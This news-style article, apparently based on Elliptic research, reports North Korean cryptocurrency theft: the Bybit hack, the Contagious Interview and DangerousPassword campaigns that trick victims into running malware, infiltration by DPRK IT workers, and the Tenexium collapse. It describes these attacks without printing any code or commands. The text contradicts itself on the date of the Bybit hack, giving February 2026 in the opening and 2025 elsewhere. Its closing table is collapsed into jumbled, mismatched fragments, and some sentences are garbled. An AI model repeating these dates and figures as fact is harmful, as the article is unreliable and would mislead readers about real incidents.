The largest confirmed crypto theft in history occurred on February 21, 2026, when North Korean (DPRK) hackers stole about $1.46 billion worth of cryptoassets from the Dubai-based exchange Bybit. Elliptic initially claimed that DPRK actors were responsible for the attack, a claim that the FBI subsequently verified. Refund addresses, worthless tokens, and diversification across mixing services were among the group's innovative money laundering strategies.

More than $1 billion had been laundered by August 2025, largely through alleged Chinese over-the-counter services. Although the majority of funds are processed today, the Bybit hack signaled an increase in DPRK's cryptocurrency theft activities rather than their cessation. In 2025, DPRK hackers stole a record $2 billion worth of cryptoassets, bringing their total to over $6 billion.

These funds, according to analysts, support North Korea's missile and nuclear programs. In 2026, Elliptic recorded twice as many exploits in January as the previous year, indicating an increase in activity. Despite the subsequent technical exploits, the main attack vector in these incidents is social engineering.

To get around language barriers and improve deception, operators create plausible personas and pretexts, probably with the help of AI. An illustration of a Zoom error screen that a victim might see (Source: elliptic) Risky Passwords, Contagious Interviews, and Techniques for IT Infiltration Since January 1, 2026, two ongoing campaigns, Contagious Interview and DangerousPassword, have generated $37.5 million. DangerousPassword uses hacked social media accounts to reach out to victims, frequently mentioning commonalities like previous meetings.

When victims join video calls on Zoom or Microsoft Teams, they are prompted to run command-line code that installs malware due to fictitious audio errors. In order to facilitate additional account takeovers, this malware searches for passwords, private keys, and seed phrases. By tricking victims into participating in "technical tests" through malware-infected code repositories on reliable platforms, Contagious Interview creates fake job offers.

Similar key-stealing tools are used by Execution. An illustration of a contagious Message from the interview (Source: elliptic) If victims use employer devices, both campaigns run the risk of jeopardizing the organization. In addition to this, DPRK IT personnel patiently infiltrate crypto projects. They refer to accomplices and use rented laptops for location spoofing, cloned accounts, and fictitious identities.

Although salaries generate direct income, in remote-first environments, the true objective frequently involves backdoors, persistent access, or compromised developer machines.

This evolution is exemplified by the Tenexium incident. Due to $2.5 million in liquidity drains from its treasury, Tenexium.io, a self-described decentralized margin trading protocol in the Bittensor (TAO) ecosystem, went offline on January 1, 2026. The project, which was registered in September 2025, did not exhibit any activity after December 31.

DPRK-affiliated contributors were identified in reports, and blockchain analysis showed laundering patterns—such as cross-chain overlaps and centralized cashouts—that matched known DPRK exploits. Evidence indicates that agents may now construct fictitious projects to embezzle money, moving from infiltration to creation, even though it hasn't been conclusively established as a DPRK front from the start. Vigilance is required for this ongoing campaign. DPRK strategies are evolving, combining insider threats, malware, and phishing with AI-enhanced tactics.

Date of the Incident Amount Stolen Bybit Hack: A Crucial Tactic Source February 2025: $1.46 billion FBI 2025: Social Engineering + Elliptic Exploit Total: $2B Mixed (Social Eng., IT Infil.) January–December 2025 Tenexium Elliptic January 1, 2026: $2.5 million Possible False Project X Report Risky Password + Contagious Interview $37.5M in January 2026 The use of social engineering Research on Elliptics Crypto companies need to thoroughly vet remote hires, check for social engineering red flags like unsolicited calls or repo tests, and use blockchain analytics across more than 60 chains to track down tainted funds. Elliptic's tools, such as Investigator for Laundering Visualization, aid in the blocking of assets connected to the DPRK.